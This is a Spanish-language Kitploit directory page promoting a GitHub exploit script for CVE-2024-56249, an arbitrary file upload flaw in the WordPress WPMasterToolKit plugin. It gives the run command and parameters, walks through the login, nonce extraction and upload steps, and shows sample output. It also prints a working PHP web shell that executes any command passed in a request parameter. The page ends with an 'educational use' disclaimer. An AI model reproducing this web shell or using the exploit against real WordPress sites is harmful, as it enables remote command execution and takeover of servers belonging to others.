Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-56249 — Plugin WPMasterToolKit de WordPress <= 1.13.1 - Vulnerabilidad de subida de archivos arbitraria | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2024-56249
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónShellcodeExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubnxploited/cve-2024-56249

CVE-2024-56249

Plugin WPMasterToolKit de WordPress <= 1.13.1 - Vulnerabilidad de subida de archivos arbitraria

Ver Repositorio
111hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🛠️ WordPress Master Toolkit Exploit (CVE-2024-56249)

🌟 Resumen

Este script explota una vulnerabilidad de subida arbitraria de archivos en el plugin WPMasterToolKit de WordPress, permitiendo a un atacante subir un web shell al servidor. La vulnerabilidad existe en versiones <= 1.13.1 del plugin.

📝 Detalles del CVE

  • ID del CVE: CVE-2024-56249
  • Publicado: 2025-01-02
  • Actualizado: 2025-01-02
  • Descripción: Vulnerabilidad de subida sin restricciones de archivos con tipo peligroso en Webdeclic WPMasterToolKit permite subir un Web Shell a un servidor web.
  • CWE: CWE-434: Subida sin restricciones de archivo con tipo peligroso
  • Puntuación CVSS: 9.1 (Crítico)
  • Vector CVSS: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

🚀 Uso

Para explotar esta vulnerabilidad, usa el siguiente comando:

root@kitploit:~
python CVE-2024-56249.py -u <URL> -un <USERNAME> -p <PASSWORD> -fn <FILENAME>

📋 Parámetros

  • -u / --url: URL de WordPress objetivo (p. ej., http://192.168.100.74:888/wordpress)
  • -un / --username: Nombre de usuario administrador de WordPress
  • -p / --password: Contraseña del administrador de WordPress
  • -fp / --filepath: Ruta de subida del archivo (por defecto: wp-content/uploads/2025/03)
  • -fn / --filename: Nombre del archivo a subir (por defecto: shell.php)

🧩 Explicación del script

🔍 1. Probar vulnerabilidad

El script comienza probando la URL objetivo para verificar si es vulnerable a CVE-2024-56249 comprobando la versión del plugin WPMasterToolKit.

🔑 2. Autenticarse en WordPress

A continuación, intenta iniciar sesión en el panel de administración de WordPress utilizando las credenciales proporcionadas.

🛡️ 3. Extraer tokens de seguridad

Tras un inicio de sesión exitoso, el script extrae los tokens de seguridad necesarios (nonce y token) requeridos para la subida de archivos.

📤 4. Desplegar payload

Sube el archivo especificado (p. ej., un web shell) al servidor objetivo usando los tokens extraídos.

✅ 5. Verificar subida

Finalmente, el script verifica si el archivo se ha subido correctamente comprobando su accesibilidad a través de la URL objetivo.

📂 Nota

Asegúrate de que el archivo shell (p. ej., shell.php) esté ubicado en el mismo directorio que el script antes de ejecutarlo. Esto es necesario para que el script pueda localizar y subir el archivo correctamente.

Ejemplo de archivo shell (shell.php)

root@kitploit:~
<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
}
?>

💡 Ejemplo

root@kitploit:~
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php

🖥️ Salida

root@kitploit:~
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
[🔍] Detected plugin version: 1.13.1
[🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...
[🔑] Attempting to log in...
[✅] Authentication successful!
[📡] Extracting security tokens...
[✅] Extracted nonce: e4ae47c8d8
[✅] Extracted token: e4ae47c8d8
[📤] Attempting to upload shell.php to wp-content/uploads/2025/03...
[✅] Upload request sent successfully.
[🔥] Shell successfully uploaded! Access it here: http://target/wp-content/uploads/2025/03/shell.php

🛠️ Uso del script

root@kitploit:~
usage: CVE-2025-1307.py [-h] -u URL -un USERNAME -p PASSWORD [-fp FILEPATH] [-fn FILENAME]

Master Toolkit Exploit CVE-2024-56249 #by Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://192.168.100.74:888/wordpress4/)
  -un, --username USERNAME
                        WordPress admin username
  -p, --password PASSWORD
                        WordPress admin password
  -fp, --filepath FILEPATH
                        File upload path (default: wp-content/uploads/2025/03)
  -fn, --filename FILENAME
                        File name to upload (default: shell.php)

⚠️ Descargo de responsabilidad

Esta herramienta está destinada únicamente a fines educativos. Úsala bajo tu propio riesgo. El autor no es responsable de ningún uso indebido o daño causado por esta herramienta.


Script de exploit por Nxploit | Khaled Alenazi

Descargar herramienta